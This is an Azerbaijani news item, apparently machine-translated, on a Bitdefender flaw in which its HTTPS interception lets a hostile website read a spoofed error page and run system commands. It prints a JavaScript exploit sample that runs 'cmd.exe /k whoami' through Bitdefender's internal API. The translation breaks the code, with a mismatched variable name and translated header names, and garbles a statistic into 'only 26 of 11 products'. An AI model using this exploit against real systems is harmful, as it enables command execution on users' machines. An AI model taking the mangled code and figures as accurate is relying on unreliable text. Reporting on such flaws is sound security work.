Vladimir Palant, Adblock Plus-ın yaradıcısı,
Problemin səbəbi Bitdefender antivirusunun saytın orijinal TLS sertifikatını əvəz etməklə HTTPS trafikinin lokal tutulmasını həyata keçirməsidir. Müştərinin sistemində əlavə bir kök sertifikatı quraşdırılmışdır ki, bu da istifadə olunan trafik yoxlama sisteminin işini gizlətməyə imkan verir. Antivirus özünü qorunan trafikə sıxışdırır və Təhlükəsiz Axtarış funksiyasını həyata keçirmək üçün bəzi səhifələrə öz JavaScript kodunu daxil edir və təhlükəsiz qoşulma sertifikatı ilə bağlı problemlər yaranarsa, qaytarılmış xəta səhifəsini özününki ilə əvəz edir. Yeni xəta səhifəsi açılan server adından təqdim edildiyi üçün həmin serverdəki digər səhifələr Bitdefender tərəfindən daxil edilmiş məzmuna tam giriş imkanına malikdir.
Təcavüzkar tərəfindən idarə olunan saytı açarkən həmin sayt XMLHttpRequest göndərə və cavab verərkən HTTPS sertifikatı ilə bağlı problemlər yarada bilər ki, bu da Bitdefender tərəfindən saxtalaşdırılan xəta səhifəsinin qaytarılmasına səbəb olacaq. Səhv səhifəsi təcavüzkarın domeni kontekstində açıldığı üçün o, Bitdefender parametrləri ilə saxta səhifənin məzmununu oxuya bilər. Bitdefender tərəfindən təqdim edilən səhifədə ayrıca Safepay brauzer seansını işə salmaq üçün daxili Bitdefender API-dən istifadə etməyə, ixtiyari əmr satırı bayraqlarını təyin etməyə və “--utility-cmd-prefiks”dən istifadə edərək istənilən sistem əmrlərini işə salmağa imkan verən sessiya açarı da var. bayraq. İstismar nümunəsi (param1 və param2 xəta səhifəsindən alınan dəyərlərdir):
var sorğu = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Məzmun növü", "tətbiq/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Xatırladaq ki, 2017-ci ildə aparılan bir araşdırma
11 məhsuldan yalnız 26-i cari şifrə dəstlərini təmin etdi. 5 sistem sertifikatları yoxlamadı (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security və Total Security məhsulları hücuma məruz qaldı
Mənbə: opennet.ru